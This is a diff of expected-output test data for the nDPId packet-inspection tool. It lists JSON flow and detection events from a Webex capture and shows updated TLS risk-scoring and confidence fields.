{"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
 00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1058,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570693238,"flow_last_seen":1444570693238,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1444570693238,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55671,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1058,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1444570693238,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1444570693238,"pkt":"ABoRAAACABoRAAABCABFAAA8LOJAAEAGVXAKCAABrfMAbtl3AbsPD\/XWAAAAAKACOQic9QAAAgQFtAQCCAoATNk0AAAAAAEDAwY="}
 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1059,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1444570693244,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570693244,"pkt":"ABoRAAACABoRAAABCABFAAAoAxBAABAGr1at8wBuCggAAQG72Xfw8AopDw\/111AS\/\/8cNQAA"}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1060,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1444570693245,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570693245,"pkt":"ABoRAAACABoRAAABCABFAAAoLONAAEAGVYMKCAABrfMAbtl3AbsPD\/XX8PAKKlAQOQjjLQAA"}
-00830{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1063,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570693238,"flow_last_seen":1444570693297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1444570693297,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55671,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-01210{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1074,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570693238,"flow_last_seen":1444570693766,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":682,"midstream":0,"ts_msec":1444570693766,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55671,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
+00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1063,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570693238,"flow_last_seen":1444570693297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1444570693297,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55671,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01396{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1074,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570693238,"flow_last_seen":1444570693766,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":682,"midstream":0,"ts_msec":1444570693766,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55671,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1112,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570694561,"flow_last_seen":1444570694561,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1444570694561,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51839,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1112,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1444570694561,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1444570694561,"pkt":"ABoRAAACABoRAAABCABFAAA802lAAEAGOT4KCAABPm3lnsp\/AbubwQrQAAAAAKACOQiUEgAAAgQFtAQCCAoATNm5AAAAAAEDAwY="}
 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1113,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1444570694564,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570694564,"pkt":"ABoRAAACABoRAAABCABFAAAoAytAABAGOZE+beWeCggAAQG7yn9kPvUvm8EK0VAS\/\/+1ggAA"}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1114,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1444570694564,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570694564,"pkt":"ABoRAAACABoRAAABCABFAAAo02pAAEAGOVEKCAABPm3lnsp\/AbubwQrRZD71MFAQOQh8ewAA"}
-00831{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1115,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570694561,"flow_last_seen":1444570694614,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1444570694614,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51839,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00936{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1115,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570694561,"flow_last_seen":1444570694614,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1444570694614,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51839,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1230,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570699074,"flow_last_seen":1444570699074,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1444570699074,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1230,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1444570699074,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1444570699074,"pkt":"ABoRAAACABoRAAABCABFAAA8OjpAAEAGn3oKCAABNvEgDrSDAbvRQeFHAAAAAKACOQhpXwAAAgQFtAQCCAoATNt9AAAAAAEDAwY="}
 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1231,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1444570699077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570699077,"pkt":"ABoRAAACABoRAAABCABFAAAoA2VAABAGBmQ28SAOCggAAQG7tIMuvh640UHhSFAS\/\/+YiwAA"}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1232,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1444570699077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570699077,"pkt":"ABoRAAACABoRAAABCABFAAAoOjtAAEAGn40KCAABNvEgDrSDAbvRQeFILr4euVAQOQhfhAAA"}
-00853{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1233,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570699074,"flow_last_seen":1444570699079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1444570699079,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"api.crittercism.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1233,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570699074,"flow_last_seen":1444570699079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1444570699079,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"api.crittercism.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1235,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570699096,"flow_last_seen":1444570699096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1444570699096,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59756,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1235,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1444570699096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1444570699096,"pkt":"ABoRAAACABoRAAABCABFAAA8731AAEAGBawKCAABTi7tW+lsAFBr3TT9AAAAAKACOQhjAgAAAgQFtAQCCAoATNuAAAAAAAEDAwY="}
 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1236,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1444570699101,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570699101,"pkt":"ABoRAAACABoRAAABCABFAAAoA2dAABAGIddOLu1bCggAAQBQ6WyUIssCa900\/lAS\/\/+AggAA"}
@@ -252,16 +252,17 @@
 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1238,"source":"webex.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1444570699106,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570699106,"pkt":"ABoRAAACABoRAAABCABFAAAoA2hAABAGIdZOLu1bCggAAQBQ6W3tNUJzEsq9jVAS\/\/+AgQAA"}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1239,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1444570699107,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570699107,"pkt":"ABoRAAACABoRAAABCABFAAAo735AAEAGBb8KCAABTi7tW+lsAFBr3TT+lCLLA1AQOQhHewAA"}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1240,"source":"webex.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1444570699107,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570699107,"pkt":"ABoRAAACABoRAAABCABFAAAoZg1AAEAGjzAKCAABTi7tW+ltAFASyr2N7TVCdFAQOQhHegAA"}
-00808{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1241,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570699096,"flow_last_seen":1444570699201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":536,"flow_avg_l4_payload_len":134,"midstream":0,"ts_msec":1444570699201,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59756,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"cp.pushwoosh.com","url":"cp.pushwoosh.com\/json\/1.3\/registerDevice","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.2; LG-D855 Build\/KVT49L.A1412087656)"}}
-00808{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1245,"source":"webex.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570699101,"flow_last_seen":1444570699212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":334,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":83,"midstream":0,"ts_msec":1444570699212,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59757,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"cp.pushwoosh.com","url":"cp.pushwoosh.com\/json\/1.3\/applicationOpen","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.2; LG-D855 Build\/KVT49L.A1412087656)"}}
-00897{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1251,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570699074,"flow_last_seen":1444570699636,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1382,"flow_tot_l4_payload_len":1598,"flow_avg_l4_payload_len":266,"midstream":0,"ts_msec":1444570699636,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"api.crittercism.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"c800cea031c10ffe47e1d72c9264577a","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}}
-01237{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1259,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1444570699074,"flow_last_seen":1444570699643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5712,"flow_avg_l4_payload_len":408,"midstream":0,"ts_msec":1444570699643,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"api.crittercism.com","server_names":"*.crittercism.com,crittercism.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"c800cea031c10ffe47e1d72c9264577a","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL Wildcard, CN=*.crittercism.com","fingerprint":"68:8B:FC:77:1E:CA:80:33:0C:A9:0E:29:A6:E4:0D:FC:3A:AE:43:18"}}
+00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1241,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570699096,"flow_last_seen":1444570699201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":536,"flow_avg_l4_payload_len":134,"midstream":0,"ts_msec":1444570699201,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59756,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"cp.pushwoosh.com","url":"cp.pushwoosh.com\/json\/1.3\/registerDevice","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.2; LG-D855 Build\/KVT49L.A1412087656)"}}
+00842{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1243,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570699096,"flow_last_seen":1444570699202,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":626,"flow_avg_l4_payload_len":104,"midstream":0,"ts_msec":1444570699202,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59756,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"cp.pushwoosh.com","url":"cp.pushwoosh.com\/json\/1.3\/registerDevice","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.2; LG-D855 Build\/KVT49L.A1412087656)"}}
+00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1245,"source":"webex.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570699101,"flow_last_seen":1444570699212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":334,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":83,"midstream":0,"ts_msec":1444570699212,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59757,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"cp.pushwoosh.com","url":"cp.pushwoosh.com\/json\/1.3\/applicationOpen","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.2; LG-D855 Build\/KVT49L.A1412087656)"}}
+01002{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1251,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570699074,"flow_last_seen":1444570699636,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1382,"flow_tot_l4_payload_len":1598,"flow_avg_l4_payload_len":266,"midstream":0,"ts_msec":1444570699636,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"api.crittercism.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"c800cea031c10ffe47e1d72c9264577a","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}}
+01342{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1259,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1444570699074,"flow_last_seen":1444570699643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5712,"flow_avg_l4_payload_len":408,"midstream":0,"ts_msec":1444570699643,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"api.crittercism.com","server_names":"*.crittercism.com,crittercism.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"c800cea031c10ffe47e1d72c9264577a","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL Wildcard, CN=*.crittercism.com","fingerprint":"68:8B:FC:77:1E:CA:80:33:0C:A9:0E:29:A6:E4:0D:FC:3A:AE:43:18"}}
 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1271,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570699916,"flow_last_seen":1444570699916,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1444570699916,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
